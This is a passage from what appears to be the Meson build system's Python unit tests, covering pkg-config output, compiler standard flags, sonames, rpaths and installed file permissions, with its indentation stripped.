cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(glob(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(glob(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(glob(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(glob(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(glob(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir, compiler, p: str):
lang_std = p + '_std'
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()[lang_std].choices:
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and not (compiler.get_id(), v) in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
# make unknown -std=... options errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
simpletest_id = Target.construct_id_from_path('subprojects/sublib', 'simpletest', '@exe')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', simpletest_id, 'simpletest-unity.c'))
sublib_id = Target.construct_id_from_path('subprojects/sublib', 'sublib', '@sha')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', sublib_id, 'sublib-unity.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
install umask of 022, regardless of the umask at time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
self.assertEqual(os.path.basename(t['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(t['target_sources'][0]['sources'][0]))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
# C program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_coverage(self):
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found')
if not shutil.which('genhtml') and not gcovr_new_rootdir:
raise unittest.SkipTest('genhtml not found and gcovr is too old')
if 'clang' in os.environ.get('CC', ''):
# We need to use llvm-cov instead of gcovr with clang
raise unittest.SkipTest('Coverage does not work with clang right now, help wanted!')
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
'''
'''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_secondary_dependencies(self):
'''
Check that Meson gets -Wl,-rpath-link right for secondary dependencies
This test requires at least two libraries, as -Wl,-rpath-link is only
required for dependencies of dependencies (i.e. secondary dependencies).
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 rpath-link secondary')
# build libA
testdirlibA = os.path.join(testdirbase, 'libA')
testlibAprefix = os.path.join(tempdirname, 'libAprefix')
self.init(testdirlibA, extra_args=['--prefix=' + testlibAprefix,
'--libdir=lib',
'--default-library=shared'], default_args=False)
self.build()
self.install(use_destdir=False)
# build libB (uses libA)
pkg_dir = [os.path.join(testlibAprefix, 'lib/pkgconfig')]
self.new_builddir()
testdirlibB = os.path.join(testdirbase, 'libB')
testlibBprefix = os.path.join(tempdirname, 'libBprefix')
self.init(testdirlibB, extra_args=['--prefix=' + testlibBprefix,
'--libdir=lib',
'--default-library=shared'], default_args=False,
override_envvars={'PKG_CONFIG_PATH': ':'.join(pkg_dir)})
self.build()
self.install(use_destdir=False)
# build executable (uses libB, secondary dependency on libA)
pkg_dir.append(os.path.join(testlibBprefix, 'lib/pkgconfig'))
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': ':'.join(pkg_dir)})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '68 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On Windows, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
